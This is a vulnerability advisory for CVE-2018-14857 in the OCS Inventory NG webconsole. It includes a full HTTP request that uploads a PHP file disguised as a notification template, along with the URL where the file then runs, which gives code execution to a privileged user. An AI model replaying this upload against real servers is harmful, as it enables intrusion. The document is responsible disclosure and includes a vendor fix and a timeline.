# Title Unrestricted File Upload (RCE) in OCS Inventory NG Webconsole before 2.5 #Reserved CVE CVE-2018-14857 # Vulnerability Overview OCS Inventory NG OCS Inventory Server through 2.5 allows a privileged user to gain access to the server via a template file containing PHP code, because file extensions other than .html are permitted. # Discovered By Simon Uvarov # Vendor Status Fixed. # Vulnerability Details The following request saves the phpinfo.php file to the `/usr/share/ocsinventory-reports/ocsreports/templates/` directory. ``` POST /ocsreports/index.php?function=notification HTTP/1.1 Host: 192.168.5.135 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.5.135/ocsreports/index.php?function=notification Content-Type: multipart/form-data; boundary=---------------------------2093529028912 Content-Length: 970 Cookie: VERS=7015; show_all_plugins_col=a%3A6%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%222%22%3Bi%3A2%3Bs%3A1%3A%223%22%3Bi%3A3%3Bs%3A1%3A%224%22%3Bi%3A4%3Bs%3A1%3A%225%22%3Bi%3A5%3Bs%3A1%3A%228%22%3B%7D; LANG=en_GB; IPDISCOVER_inv_col=a%3A6%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%222%22%3Bi%3A2%3Bs%3A1%3A%223%22%3Bi%3A3%3Bs%3A1%3A%224%22%3Bi%3A4%3Bs%3A1%3A%226%22%3Bi%3A5%3Bs%3A1%3A%227%22%3B%7D; DOWNLOAD_AFFECT_RULES_col=a%3A2%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%224%22%3B%7D; PHPSESSID=0ljuolnkjcbh77ie825k3c2dc7 Connection: close Upgrade-Insecure-Requests: 1 -----------------------------2093529028912 Content-Disposition: form-data; name="CSRF_584" c282a92b615fcae79a060321a8285c92d759197f -----------------------------2093529028912 Content-Disposition: form-data; name="onglet" NOTIF_PERSO -----------------------------2093529028912 Content-Disposition: form-data; name="old_onglet" NOTIF_PERSO -----------------------------2093529028912 Content-Disposition: form-data; name="notif_choice" PERSO -----------------------------2093529028912 Content-Disposition: form-data; name="template"; filename="phpinfo.php" Content-Type: text/html -----------------------------2093529028912 Content-Disposition: form-data; name="subject" -----------------------------2093529028912 Content-Disposition: form-data; name="RELOAD_CONF" -----------------------------2093529028912 Content-Disposition: form-data; name="Send" Update -----------------------------2093529028912-- ``` The PHP file is then accessible via http://192.168.5.135/ocsreports/templates/phpinfo.php # Timeline: 2018-08-01: vuln discovered 2018-08-01: emailed vendor 2018-08-02: reply from vendor: vuln confirmed & patch is created 2018-08-03: public disclosure # Patch: https://github.com/OCSInventory-NG/OCSInventory-ocsreports/commit/cc572819e373f7ff81dec61591b6f465b43c5515